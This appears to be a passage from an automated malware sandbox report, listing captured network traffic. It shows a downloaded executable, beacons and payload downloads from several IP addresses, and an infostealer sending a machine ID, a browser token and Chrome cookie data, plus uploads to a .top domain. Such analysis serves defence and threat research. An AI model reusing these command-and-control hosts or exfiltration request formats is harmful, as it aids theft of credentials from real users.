00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 8a f7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 70 7a 70 63 70 6e 68 00 a0 2a 00 00 a0 00 00 00 86 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 76 63 6c 61 72 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 c0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:18:09 GMTContent-Type: application/octet-streamContent-Length: 2811392Last-Modified: Thu, 21 Nov 2024 10:52:40 GMTConnection: keep-aliveETag: "673f10f8-2ae600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 8a f7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 70 7a 70 63 70 6e 68 00 a0 2a 00 00 a0 00 00 00 86 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 76 63 6c 61 72 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 c0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEJanOM/f8BEauEo6GRqguxLgAJt0LBh1uWaBD08sPTthnLouxyOeqq8UXC40zxYtXUeuLL3jc98oc4sgTt8Qg5RgpVyPUGOqQCdIMU+jHj5jPNgpCOYLzgjk7/68jQbYqRpL5buJGDaKHJUU4Qzi5sjC1iwUwrkBZLfklCNSWdGai+iykzR0ELnFD4lJb88vZch+TXuihcRzjbZvJG6mFONQPa3ignNQpsSbQgkMM4xuASI/kaIM+YTU5dBQE1SH8k0CwZj5Yc3H1S94NyGSn+DeuALqccEE8gt3uchW9hnkYs9tmlAQt7GBc9BBk/kSpz+oHgE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1732187628392Host: self.events.data.microsoft.comContent-Length: 7977Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 37 39 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1007913001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 39 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007914001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 39 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007915001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJDHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 43 33 37 32 30 42 37 32 32 38 39 39 32 32 34 37 36 36 34 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="hwid"84C3720B7228992247664------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="build"mars------FBKJDGCGDAAAKECAKKJD--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="message"browsers------IDHDGIEHJJJJEBGDAFHJ--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"plugins------BKECAEBGHDAEBFHIEGHI--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBGHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 2d 2d 0d 0a Data Ascii: ------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="message"fplugins------CFCGIIEHIEGDGDGCAEBG--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: 185.215.113.206Content-Length: 6767Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 39 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007916001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------NU8hpSAPyQZ2PcV2KXp0DkData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4e 55 38 68 70 53 41 50 79 51 5a 32 50 63 56 32 4b 58 70 30 44 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 61 6c 61 71 6f 6c 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 1f 1c 79 a4 5c 10 e8 ba bc 42 04 ef ad 92 eb e8 2e a6 b6 1f 99 92 04 bb f8 a9 a1 79 9d 5c f7 ae 2c 31 43 53 31 b6 99 d5 bf ce ac c8 d3 c8 f0 6d e3 b3 e7 0e c1 1a de a6 40 f7 06 5e 31 22 c0 ff 80 6d 8f f7 21 fd 32 02 f7 ba 1c 27 11 43 38 12 68 08 24 06 75 de 72 96 d0 44 27 fa 8e 49 a0 24 34 5f 84 e7 e3 b3 d1 f0 5d ae 38 70 e5 49 f2 cf 44 e7 c6 60 76 96 0d 10 89 57 f9 20 eb f0 0a 42 1d 8a 09 d6 39 1e f6 ab 53 41 17 96 8e d9 19 35 4e 75 56 97 bf 1a 81 8a 17 8d 4d aa 3c d7 c7 39 2f b9 0c 4e 1d 15 f3 75 86 60 b3 5e 07 d0 51 ff 30 f5 01 ed d0 10 be 93 98 74 24 ee 35 06 f5 cb 54 ce 49 f1 34 2f 86 3b 61 cb 9c fe 45 94 c1 c9 83 c3 7c 0b 5a 6b 85 f7 fe a5 55 fd dc b0 e3 bb 89 16 25 d5 89 ce e2 0b 7c 7c 38 38 f2 a1 e4 14 71 7f 0c 66 ff d5 75 1f 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4e 55 38 68 70 53 41 50 79 51 5a 32 50 63 56 32 4b 58 70 30 44 6b 2d 2d 0d 0a Data Ascii: --------------------------NU8hpSAPyQZ2PcV2KXp0DkContent-Disposition: form-data; name="file"; filename="Qalaqolu.bin"Content-Type: application/octet-streamy\B.y\,1CS1m@^1"m!2'C8h$urD'I$4_]8pID`vW B9SA5NuVM<9/Nu`^Q0t$5TI4/;aE|ZkU%||88qfu--------------------------NU8hpSAPyQZ2PcV2KXp0Dk--
                          Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 91343Content-Type: multipart/form-data; boundary=------------------------UmnIKSwV415tA2rpsAaOcSData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 55 6d 6e 49 4b 53 77 56 34 31 35 74 41 32 72 70 73 41 61 4f 63 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 6f 67 75 76 75 6d 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 7b 0a 3f e8 4c 67 aa 13 ea d6 1a 1a 4d 6f 6d 40 92 e6 f3 4a b7 d7 79 92 eb 61 8f 56 a9 d2 cc 03 66 e2 40 fc 9c f3 72 b6 46 61 65 a9 3e 76 99 ef f4 f4 be 74 5a f7 c8 6c c2 d9 f8 60 ba 21 c4 36 99 78 49 35 41 15 a1 c0 81 99 dc 26 73 48 da d6 42 cf 3d 2e 55 10 fc fb 9f b2 30 4a 31 46 56 48 79 c1 7f 05 0e 9a 3e 7e c3 f8 3e 83 87 0b 2e e4 cf 30 ac 17 2e 95 08 f6 16 a9 a4 68 90 83 a2 90 02 df 6b d6 1e 4b 83 53 12 de 83 b5 cf 05 27 9b b9 30 c5 1b 0e dd b6 5b 9c f9 d6 d0 9d af c9 3f 0b 70 c6 87 53 ea a6 3f 3c 6e bf dc 6e 29 3b 07 65 49 6d ad 06 02 ce dc d1 66 ba 02 19 bd 5f 7d 58 d4 a1 6d 47 66 0e 67 77 8b 26 05 0b 92 91 94 6f d7 8f bf d7 2e f1 9f 9a 90 ca 9c 91 2b c2 89 48 0d 9d 25 14 80 8a 46 d5 de 6f 6f 3c 20 8b d9 9b 4b 64 89 33 9c 20 c6 19 ea e8 44 0d c5 f4 8f 46 86 29 bd cb 4b 9e 39 98 43 7c 56 94 a2 a2 44 a0 af b8 e5 b9 ce 45 9f 3d 6e 42 c8 41 bf 71 79 8c c1 4c 0e ce 1a 9d cf 5a 94 49 37 9d 1f 91 d1 1a 49 85 c1 67 de 3e 43 ce 99 11 5c 5b 5c 9d fa 47 4c 02 9b 80 72 7b e5 bb 68 a4 8d 91 0b 77 ae 49 cd 8c 5b 68 24 cf 31 65 07 b6 e2 ea 22 8d 9c a7 ea 79 e8 2b 6a 1d 2e 8c de e1 1c 02 cf ca b5 42 67 d7 3a ff 2b 79 14 42 3d 42 8d 59 e1 9b d9 e7 03 d9 34 c9 fe 5d 9f a5 cc 5e 00 80 60 9d 51 54 5f 26 09 6f 8f 40 74 fd 38 69 b1 b8 4a ca d5 b1 c2 9a 8d 9e 21 5e 72 c5 5e be 03 d8 40 0c b2 93 da 36 f2 49 7a 7a f7 da e7 fc ee 04 07 39 2c 76 65 fe ad 45 4d 6e 5f fd b6 c5 5d f0 8b cb 1f 4a c6 92 a4 25 8e a0 54 8b b0 03 fa 50 6e 91 e9 48 d6 6a 9a fd b3 29 e5 5a e3 00 d3 8d e4 52 b9 37 01 93 39 0e cd d6 3e 74 e2 8e aa 45 f9 4c 9a 97 33 42 0f 0d ef 49 1e d5 bf 65 b8 34 53 6d 44 a6 0f 06 5d 57 e0 72 59 b0 85 7e 7b 41 8b 12 d3 43 bd 2a 66 4b 8f b5 5e 7b 4d 94 58 91 a6 8d c8 c4 56 f2 ca 60 e4 a9 84 d3 84 41 57 95 3d 71 08 7c 11 47 5e 3f db 5f ee d1 e8 5f da d0 7b 08 00 71 5f 13 8d 4d af b7 8f 65 cd f5 44 bb 83 0b bf 78 33 8b 41 9b 96 76 3d 7a f1 f4 35 31 72 d5 bc 5c 34 8e 0b 35 15 b5 5c 74 52 ba 2f 29 1e 4a 8d ad 5b 0c 09 5c 0e 31 e0 b4 b9 2d 50 c5 e8 84 73 f6 64 4b 77 5e 52 b7 4e 1a 08 34 c1 b4 f7 87 a8 18 e4 f5 c3 cb 25 d6 38 7f 1b 89 ae 7f fa c5 2e 95 aa 61 10 37 6b c7 a1 9e 4e fc d4 0f bc 13 ea 5b 23 37 4b 41 1a 3b c1 c4 14 64 37 e2 83 1e 39 a4 f0 a3 8a af 50 b9 fc 97 f6 1a fc c4 d9 55 ff 4c 30 09 b9 b8 a5 77 1e e6 ab 8e 79 f7 53 36 fd 80 06 5f 54 7f ca ff 45 48 9f 50 7a c1 33 b2 2a e6 57 50 a5 d7 31 19 5c
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKFHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------JJKFBAKFBGDHIEBGDAKF--
